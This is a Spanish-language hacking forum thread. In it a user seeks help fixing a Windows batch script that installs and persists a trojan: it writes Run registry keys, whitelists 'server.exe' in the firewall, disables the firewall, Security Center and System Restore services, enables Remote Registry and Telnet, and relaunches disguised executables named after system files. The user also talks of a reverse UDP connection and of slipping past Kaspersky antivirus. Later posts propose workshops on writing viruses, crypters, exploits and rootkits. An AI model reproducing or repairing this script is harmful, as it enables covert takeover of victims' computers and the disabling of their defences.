Mensajes

LOL la re clavaste man :p

Ni idea porque me tira este cartel

El mensaje personal no se pudo enviar a 'xxxx' debído a que excediste el límite de mensajes personales

Y eso que en la bandeja de entrada no tengo nada y habre mandado como mucho 10 mensajes personales

24 De Agosto

El firewall me va a detectar la conexion inversa UDP de la maquina.. pero no el .bat supongo bueno entonces todo pasa por hacer indetectable al AV.. Bueno saludos y gracias !

Ah ok.. creo que ya esta.. supongo el kaspersky se capta de alguna modificacion asi en el registro y demas por mi .bat? espero que no asi no me delata xD

Ah.. listo ya lo puse a la exclusion todo en una linea ahora lo pruebo y te digo despues.... lo otro esta bien ya creo.

Esto...

:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r

Desde re querry hasta /f va todo en una linea?

Hola si probe no entendi lo del reg add.. eso creo que esta bien va separado
reg add el problema del inicio lo solucione gracias pero lo otro es el problema para agregar la exclusion en el firewall de windows el /v server.exe intente sacando el /v y no me tiro mas el error pero me lo tiro con el server.exe nose reconoe como un comando interno o externo bla bla.. nose porqué no esta bien la exclusion?

Mira estas son las 2 cositas que me tira..  y nose porqué con respecto a este .bat

Código [Seleccionar] Expandir

@echo off
:inicio
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio

Estas son las 2 cosas que me tira

http://www.subirimagenes.com/otros-asd0001-295568.html

Ahi el error ese /v solamente. y el otro error que nose ve es algo asi: "inicio:" nose reconoce como coso interno o externo,etc.. Sabes porque?

Estabamos hablando precisamente eso y a mi una de las mejores opciones para darle vida y verdadera utilidad al evento es crear una serie de "talleres" orientados al malware en los q los q tengan conocimientos erspecto al tema orienten a los demas.

Yo no tengo ningun problema en guiar alguno. Se me han ocurrido estos:

- Virus (distintos metodos de infeccion de ejecutables, rar's... payloads varios en asm, todas esas cosas, q aki solo se habla de troyanos xD)
- Crypters (parece q solo k solo se habla de como dejar los de los demas indetectables, q tal si aprendemos a hacernos uno propio?)
- Exploits (podemos hace programas vulnerables a stack overflow por ejemplo y aprender a explotarlos para q nos den una shell remota, podemos hacer shell codes... todo eso, pero de forma practica y con ejemplo)
- Rootkits

Weno, cualkier otra ida pues será bienvenida, los q os kerais apuntar decidlo, pa ver si se abre el taller o no..

Salu2

Quiero ser tu aprendiz !!

Por si las dudas los que no estan enterados este subforo ya esta creado en la parte de OFFTOPIC empezamos a contribuir..